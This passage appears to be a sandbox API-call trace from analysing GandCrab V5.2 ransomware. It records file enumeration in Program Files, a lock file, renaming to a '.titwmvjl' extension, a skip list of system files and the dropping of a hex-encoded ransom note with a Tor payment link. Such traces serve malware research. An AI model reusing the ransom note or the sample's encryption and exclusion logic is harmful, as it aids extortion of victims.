4\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.527] WriteFile (in: hFile=0x218, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259fa30, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259fa30*=0x2162, lpOverlapped=0x0) returned 1 [0067.528] CloseHandle (hObject=0x218) returned 1 [0067.528] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.528] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.528] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x344)) [0067.528] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.528] GetWindowsDirectoryW (in: lpBuffer=0x2610000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.528] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2610200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2610600, lpMaximumComponentLength=0x2610608, lpFileSystemFlags=0x2610604, lpFileSystemNameBuffer=0x2610400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2610600*=0xd2ca4def, lpMaximumComponentLength=0x2610608*=0xff, lpFileSystemFlags=0x2610604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.529] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Program Files\\d2ca4a09d2ca4deb61a.lock") returned 41 [0067.529] CreateFileW (lpFileName="C:\\Program Files\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\program files\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x218 [0067.529] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.529] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.529] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0067.529] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*" | out: lpString1="C:\\Program Files\\*") returned="C:\\Program Files\\*" [0067.529] FindFirstFileExW (in: lpFileName="C:\\Program Files\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0x4c9db8 [0067.529] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.529] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.529] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.530] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.530] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0067.530] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0067.530] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Common Files" | out: lpString1="C:\\Program Files\\Common Files") returned="C:\\Program Files\\Common Files" [0067.530] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.530] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.530] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.530] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Program Files\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Program Files\\d2ca4a09d2ca4deb61a.lock" [0067.530] lstrlenW (lpString=".titwmvjl") returned 9 [0067.530] lstrlenW (lpString="C:\\Program Files\\d2ca4a09d2ca4deb61a.lock") returned 41 [0067.530] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.530] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Program Files\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 50 [0067.531] lstrlenW (lpString="C:\\Program Files\\d2ca4a09d2ca4deb61a.lock") returned 41 [0067.531] lstrlenW (lpString=".lock") returned 5 [0067.531] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.531] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.531] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.531] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.531] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.531] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0067.531] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0067.531] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="desktop.ini" | out: lpString1="C:\\Program Files\\desktop.ini") returned="C:\\Program Files\\desktop.ini" [0067.531] lstrlenW (lpString=".titwmvjl") returned 9 [0067.531] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0067.531] VirtualAlloc (lpAddress=0x0, dwSize=0x78, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.531] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Program Files\\desktop.ini.titwmvjl") returned 37 [0067.531] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0067.532] lstrlenW (lpString=".ini") returned 4 [0067.532] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.532] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".ini ") returned 5 [0067.532] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0067.532] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.532] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0067.532] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0067.532] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0067.532] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.532] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.532] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0067.532] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0067.532] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Internet Explorer" | out: lpString1="C:\\Program Files\\Internet Explorer") returned="C:\\Program Files\\Internet Explorer" [0067.533] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.533] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0067.533] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0067.533] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Java" | out: lpString1="C:\\Program Files\\Java") returned="C:\\Program Files\\Java" [0067.533] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.533] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0067.533] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0067.533] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Office" | out: lpString1="C:\\Program Files\\Microsoft Office") returned="C:\\Program Files\\Microsoft Office" [0067.533] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.533] lstrcmpW (lpString1="Microsoft Office 15", lpString2=".") returned 1 [0067.533] lstrcmpW (lpString1="Microsoft Office 15", lpString2="..") returned 1 [0067.533] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Office 15" | out: lpString1="C:\\Program Files\\Microsoft Office 15") returned="C:\\Program Files\\Microsoft Office 15" [0067.533] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.533] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0067.533] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0067.533] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="MSBuild" | out: lpString1="C:\\Program Files\\MSBuild") returned="C:\\Program Files\\MSBuild" [0067.533] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.533] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0067.533] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0067.533] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Reference Assemblies" | out: lpString1="C:\\Program Files\\Reference Assemblies") returned="C:\\Program Files\\Reference Assemblies" [0067.533] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.533] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0067.533] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0067.533] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Program Files\\TITWMVJL-DECRYPT.txt") returned="C:\\Program Files\\TITWMVJL-DECRYPT.txt" [0067.533] lstrlenW (lpString=".titwmvjl") returned 9 [0067.534] lstrlenW (lpString="C:\\Program Files\\TITWMVJL-DECRYPT.txt") returned 37 [0067.534] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.534] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Program Files\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 46 [0067.534] lstrlenW (lpString="C:\\Program Files\\TITWMVJL-DECRYPT.txt") returned 37 [0067.534] lstrlenW (lpString=".txt") returned 4 [0067.534] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.534] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".txt ") returned 5 [0067.534] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0067.534] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.534] lstrlenW (lpString="C:\\Program Files\\TITWMVJL-DECRYPT.txt") returned 37 [0067.534] lstrlenW (lpString="C:\\Program Files\\TITWMVJL-DECRYPT.txt") returned 37 [0067.534] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0067.534] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0067.534] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0067.534] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0067.534] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0067.534] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0067.534] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0067.535] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0067.535] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.535] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.535] lstrcmpW (lpString1="Uninstall Information", lpString2=".") returned 1 [0067.535] lstrcmpW (lpString1="Uninstall Information", lpString2="..") returned 1 [0067.535] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Uninstall Information" | out: lpString1="C:\\Program Files\\Uninstall Information") returned="C:\\Program Files\\Uninstall Information" [0067.535] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.535] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0067.535] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0067.535] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Defender" | out: lpString1="C:\\Program Files\\Windows Defender") returned="C:\\Program Files\\Windows Defender" [0067.535] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.535] lstrcmpW (lpString1="Windows Journal", lpString2=".") returned 1 [0067.535] lstrcmpW (lpString1="Windows Journal", lpString2="..") returned 1 [0067.535] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Journal" | out: lpString1="C:\\Program Files\\Windows Journal") returned="C:\\Program Files\\Windows Journal" [0067.535] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.535] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0067.535] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0067.535] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Mail" | out: lpString1="C:\\Program Files\\Windows Mail") returned="C:\\Program Files\\Windows Mail" [0067.535] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.535] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0067.535] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0067.535] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Media Player" | out: lpString1="C:\\Program Files\\Windows Media Player") returned="C:\\Program Files\\Windows Media Player" [0067.535] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.535] lstrcmpW (lpString1="Windows Multimedia Platform", lpString2=".") returned 1 [0067.536] lstrcmpW (lpString1="Windows Multimedia Platform", lpString2="..") returned 1 [0067.536] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Multimedia Platform" | out: lpString1="C:\\Program Files\\Windows Multimedia Platform") returned="C:\\Program Files\\Windows Multimedia Platform" [0067.536] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.536] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0067.536] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0067.536] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows NT" | out: lpString1="C:\\Program Files\\Windows NT") returned="C:\\Program Files\\Windows NT" [0067.536] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.536] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0067.536] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0067.536] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Photo Viewer" | out: lpString1="C:\\Program Files\\Windows Photo Viewer") returned="C:\\Program Files\\Windows Photo Viewer" [0067.536] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.536] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0067.536] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0067.536] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Portable Devices" | out: lpString1="C:\\Program Files\\Windows Portable Devices") returned="C:\\Program Files\\Windows Portable Devices" [0067.536] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.536] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0067.536] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0067.536] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Sidebar" | out: lpString1="C:\\Program Files\\Windows Sidebar") returned="C:\\Program Files\\Windows Sidebar" [0067.536] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.536] lstrcmpW (lpString1="WindowsApps", lpString2=".") returned 1 [0067.536] lstrcmpW (lpString1="WindowsApps", lpString2="..") returned 1 [0067.536] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="WindowsApps" | out: lpString1="C:\\Program Files\\WindowsApps") returned="C:\\Program Files\\WindowsApps" [0067.536] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.536] lstrcmpW (lpString1="WindowsPowerShell", lpString2=".") returned 1 [0067.536] lstrcmpW (lpString1="WindowsPowerShell", lpString2="..") returned 1 [0067.536] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="WindowsPowerShell" | out: lpString1="C:\\Program Files\\WindowsPowerShell") returned="C:\\Program Files\\WindowsPowerShell" [0067.537] FindNextFileW (in: hFindFile=0x4c9db8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0 [0067.537] FindClose (in: hFindFile=0x4c9db8 | out: hFindFile=0x4c9db8) returned 1 [0067.537] CloseHandle (hObject=0x218) returned 1 [0067.537] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.537] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0067.537] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0067.589] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0067.590] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0067.590] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.590] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.590] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.590] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.591] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Program Files (x86)\\\\TITWMVJL-DECRYPT.txt") returned 44 [0067.591] CreateFileW (lpFileName="C:\\Program Files (x86)\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\program files (x86)\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0067.591] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\